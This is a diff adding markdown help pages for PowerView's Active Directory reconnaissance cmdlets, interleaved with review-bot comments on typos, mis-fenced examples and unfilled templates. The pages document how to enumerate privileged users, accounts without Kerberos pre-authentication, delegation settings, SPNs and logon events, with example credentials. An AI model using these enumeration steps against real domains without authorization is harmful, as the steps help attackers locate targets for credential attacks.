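Review bot: Example 4 is mis-fenced: only `$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force` sits inside the code block, while `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Get-DomainSite -Credential $Cred` render as body text, and the example has no description sentence at all. The pattern (first line fenced, remainder dropped to prose) recurs in every multi-line `.EXAMPLE` in this commit, so the generator is carrying only the first line of each example into the fence; either hand-edit the generated files so all command lines share one fence and add a description such as "Returns all sites in the current domain using the specified alternate credentials", or restructure the source help so each example is a single command line followed by its remarks. Smaller items in the same file: "An site name" under -Identity should read "A site name"; the Example 3 description "Returns all sites with linked to the specified group policy object." has a stray "with"; -Identity says "Wildcards accepted." while its table reports "Accept wildcard characters: False"; and -ServerTimeLimit's text says "Default of 120 seconds." while its table says "Default value: 0", so one of the two needs reconciling.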
diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md new file mode 100755 index 0000000..8cd82b1 --- /dev/null +++ b/docs/Recon/Get-DomainSubnet.md @@ -0,0 +1,309 @@ +# Get-DomainSubnet
+
+## SYNOPSIS
+Search for all subnets or specific subnets objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all subnet objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSubnet
+```
+
+Returns the current subnets in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSubnet *admin* -Domain testlab.local
+```
+
+Returns all subnets with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all subnets with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An subnet name (e.g.
+'192.168.50.0/24'), DistinguishedName (e.g.
+'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
+or GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SiteName
+Only return subnets from the specified SiteName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Subnet
+
+Custom PSObject with translated subnet property fields.
+
+## NOTES
+
+## RELATED LINKS
+
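Review bot: Example 3, `Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"`, cannot run as written: the SYNTAX block for this cmdlet exposes `-SiteName <String>` and no `-GPLink`, so PowerShell will reject the unknown parameter. The example and its description "Returns all subnets with linked to the specified group policy object." were carried over from Get-DomainSite and should be replaced with a `-SiteName` example, which is currently the one subnet-specific parameter with no example. Example 2's `*admin*` wildcard is copied from the site doc as well; since -Identity documents subnet names as CIDR strings ('192.168.50.0/24'), a wildcard like `192.168.*` would actually illustrate the parameter. Also in this hunk: the -Identity DistinguishedName sample contains the typo `CN=Configuratioiguration` (should be `CN=Configuration`); "An subnet name" should be "A subnet name"; "properies" in DESCRIPTION should be "properties"; Example 4 has only its first line inside the fence and no description; and -ServerTimeLimit's "Default of 120 seconds." conflicts with the table's "Default value: 0".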
diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md new file mode 100755 index 0000000..29af577 --- /dev/null +++ b/docs/Recon/Get-DomainTrust.md @@ -0,0 +1,250 @@ +# Get-DomainTrust
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrust [[-Domain] <String>] [-FindOne]
+```
+
+### API
+```
+Get-DomainTrust [[-Domain] <String>] [-API] [-Server <String>] [-FindOne]
+```
+
+### LDAP
+```
+Get-DomainTrust [[-Domain] <String>] [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+{{Fill Domain Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 0
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -FindOne
+{{Fill FindOne Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### System.String
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
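Review bot: This file is an unfilled platyPS template and should not ship in this state: SYNOPSIS and DESCRIPTION are `{{Fill in the Synopsis}}` / `{{Fill in the Description}}`, the single example is `PS C:\> {{ Add example code here }}`, and every parameter description reads `{{Fill X Description}}`. Unlike the neighbouring files, the parameter tables also show `Position: 0` and `Default value: None` throughout and there is no Author/License/Required Dependencies header, which suggests the generator found no comment-based help for Get-DomainTrust and fell back to cmdlet metadata. Either add the `.SYNOPSIS`/`.DESCRIPTION`/`.PARAMETER`/`.EXAMPLE` blocks to the function and regenerate, or fill the placeholders here before merging. Two facts visible only in the SYNTAX deserve a sentence once the text is written: `-Credential` exists in the LDAP parameter set only, so the NET and API methods cannot take alternate credentials, and `-Server` applies to the API and LDAP sets but not NET. Formatting: OUTPUTS lists three type names under one `### PowerView.DomainTrust.NET` heading; `PowerView.DomainTrust.LDAP` and `PowerView.DomainTrust.API` should each get their own `###` line.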
diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md new file mode 100755 index 0000000..692f265 --- /dev/null +++ b/docs/Recon/Get-DomainTrustMapping.md @@ -0,0 +1,220 @@ +# Get-DomainTrustMapping
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrustMapping
+```
+
+### API
+```
+Get-DomainTrustMapping [-API] [-Server <String>]
+```
+
+### LDAP
+```
+Get-DomainTrustMapping [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
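Review bot: Same unfilled template as Get-DomainTrust: `{{Fill in the Synopsis}}`, `{{Fill in the Description}}`, `PS C:\> {{ Add example code here }}` and `{{Fill X Description}}` for every parameter, with no Author/License header. Fill these (or add comment-based help to the function and regenerate) before merging, and keep the wording of the shared switches (`-API`, `-LDAP`, `-LDAPFilter`, `-Server`, `-Credential`, `-Tombstone`, and the searcher tuning parameters) identical to whatever Get-DomainTrust ends up with, since the SYNTAX blocks show the same three parameter sets with the same restrictions (`-Credential` only in LDAP, `-Server` only in API and LDAP). The description should also say what the mapping does that a single Get-DomainTrust call does not, which is the one thing a reader of this page needs and cannot infer from the SYNTAX. As in Get-DomainTrust, the OUTPUTS section lists `PowerView.DomainTrust.LDAP` and `PowerView.DomainTrust.API` as plain text under the `### PowerView.DomainTrust.NET` heading; give each type its own `###` line.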
diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md new file mode 100755 index 0000000..7247a1d --- /dev/null +++ b/docs/Recon/Get-DomainUser.md @@ -0,0 +1,426 @@ +# Get-DomainUser
+
+## SYNOPSIS
+Return all users or specific user objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+### AllowDelegation (Default)
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+### DisallowDelegation
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all user objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser -Domain testlab.local
+```
+
+Return all users for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
+```
+
+Return the user with the given SID, as well as Administrator.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
+```
+
+lastlogoff samaccountname
+---------- --------------
+12/31/1600 4:00:00 PM dfm.a
+12/31/1600 4:00:00 PM dfm
+12/31/1600 4:00:00 PM harmj0y
+12/31/1600 4:00:00 PM Administrator
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
+```
+
+Search the specified OU for privileged user (AdminCount = 1) that allow delegation
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
+
+distinguishedname
+-----------------
+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+Also accepts DOMAIN\user format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SPN
+Switch.
+Only return user objects with non-null service principal names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllowDelegation
+Switch.
+Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: AllowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisallowDelegation
+Switch.
+Return user accounts that are marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: DisallowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -KerberosPreuthNotRequired
+Switch.
+Return user accounts with "Do not require Kerberos preauthentication" set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+## OUTPUTS
+
+### PowerView.User
+
+Custom PSObject with translated user property fields.
+
+PowerView.User.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
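Review bot: The parameter name `-KerberosPreuthNotRequired` (in both SYNTAX parameter sets and the `### -KerberosPreuthNotRequired` heading) is misspelled; its own description says "Do not require Kerberos preauthentication", so `-KerberosPreauthNotRequired` is intended. Because platyPS takes the name from the cmdlet, the typo is in the function's parameter declaration and not only in this markdown; correcting it here alone would make the doc disagree with the real cmdlet, so rename the parameter in the function (keeping the old spelling as an `[Alias()]` so existing scripts keep working) and regenerate. This is the switch readers will type from the docs when hunting pre-auth-disabled accounts, so it is worth getting right now. Also in this hunk: Examples 3, 6 and 7 carry only their first line inside the code fence, leaving the `lastlogoff samaccountname` table, the `$Cred = New-Object ...` / `Get-DomainUser -Credential $Cred` lines, and the `VERBOSE: \[Get-DomainSearcher\] search string: ...` output as body text with escaped brackets; the Example 4 text "privileged user (AdminCount = 1) that allow delegation" should read "privileged users (adminCount=1) that allow delegation"; "properies" in DESCRIPTION should be "properties"; -Identity says "Wildcards accepted." while its table says "Accept wildcard characters: False"; and -ServerTimeLimit's "Default of 120 seconds." conflicts with its "Default value: 0".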
diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md new file mode 100755 index 0000000..c844981 --- /dev/null +++ b/docs/Recon/Get-DomainUserEvent.md @@ -0,0 +1,144 @@ +# Get-DomainUserEvent
+
+## SYNOPSIS
+Enumerate account logon events (ID 4624) and Logon with explicit credential
+events (ID 4648) from the specified host (default of the localhost).
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses an XML path filter passed to Get-WinEvent to retrieve
+security events with IDs of 4624 (logon events) or 4648 (explicit credential
+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
+A maximum of -MaxEvents (default of 5000) are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUserEvent
+```
+
+Return logon events on the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
+```
+
+Return all logon events from the last 3 days from every domain controller in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
